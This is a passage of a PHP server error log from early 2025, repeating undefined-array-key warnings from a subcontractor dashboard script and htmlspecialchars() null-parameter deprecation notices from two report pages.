/home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [28-Jan-2025 16:34:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [28-Jan-2025 16:34:15 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [28-Jan-2025 16:34:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:35:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:37:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:40:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 16:44:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Jan-2025 20:52:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 01:20:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 02:12:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 02:56:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 03:12:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 04:48:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Jan-2025 05:32:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [30-Jan-2025 00:14:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [30-Jan-2025 00:15:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [30-Jan-2025 04:04:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [31-Jan-2025 04:22:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Feb-2025 09:16:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Feb-2025 00:39:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [12-Feb-2025 02:42:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Feb-2025 05:33:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 00:14:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 00:43:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 11:43:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Feb-2025 23:12:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Feb-2025 00:59:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Feb-2025 11:49:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Feb-2025 05:24:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Mar-2025 21:47:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:10:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:11:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:12:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Mar-2025 01:13:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Mar-2025 01:13:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [18-Mar-2025 00:21:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Mar-2025 04:31:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Mar-2025 05:43:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [18-Mar-2025 22:36:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Mar-2025 01:10:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Mar-2025 01:48:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [20-Mar-2025 01:48:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 06:13:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 07:38:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 07:50:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 07:59:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [21-Mar-2025 08:19:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 10:19:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 11:28:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 14:12:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [23-Mar-2025 23:59:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:23:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:25:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:52:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 07:54:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 08:31:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [24-Mar-2025 09:27:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [25-Mar-2025 04:40:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 00:36:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 00:37:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 02:08:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 02:13:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:02:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:19:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:24:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:25:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 03:26:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [27-Mar-2025 03:26:00 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [27-Mar-2025 04:42:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 05:11:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [27-Mar-2025 05:44:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Mar-2025 02:06:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [28-Mar-2025 03:58:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [29-Mar-2025 01:23:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [31-Mar-2025 02:11:57 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [31-Mar-2025 12:40:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [01-Apr-2025 02:27:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Apr-2025 20:22:36 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [02-Apr-2025 23:34:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [03-Apr-2025 23:23:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 00:14:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 00:54:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 08:53:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 09:07:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 14:04:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 14:05:30 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [04-Apr-2025 14:05:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 05:47:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 12:24:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 22:48:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 22:50:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [05-Apr-2025 22:50:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 02:19:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 06:25:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 07:03:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 11:37:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:45:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:47:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:47:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 12:49:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 22:25:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [06-Apr-2025 23:25:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:11:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:12:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 00:12:08 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 00:12:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 64 [07-Apr-2025 00:12:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_subtaskswithnotes.php on line 70 [07-Apr-2025 00:13:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:17:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:29:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:37:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 00:37:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 00:37:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 00:37:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 00:38:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 00:46:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:12:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:31:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:31:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:38:49 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:44:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:44:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 01:44:41 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 01:44:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:47:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 01:49:53 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:03:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:03:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:10:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:10:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:10:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:19:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:20:57 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:21:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:21:03 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:21:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:21:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:21:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:46:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:46:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:46:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 02:46:31 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 02:47:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:55:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:58:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 02:59:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:10:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:30:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:30:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 03:30:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 03:33:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:33:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:35:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:35:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 03:35:24 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 03:36:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:36:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:38:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:38:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:41:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:44:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:44:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 03:44:47 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 03:47:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:48:59 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 03:56:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:03:45 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:04:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:05:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:05:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:05:25 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:11:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:14:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:16:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:16:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:33:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:34:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:34:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [07-Apr-2025 04:34:54 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [07-Apr-2025 04:35:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:36:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:37:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:37:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:38:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:40:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:43:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [07-Apr-2025 04:44:54 UTC] PHP Warning: Undefined array key "pending" in 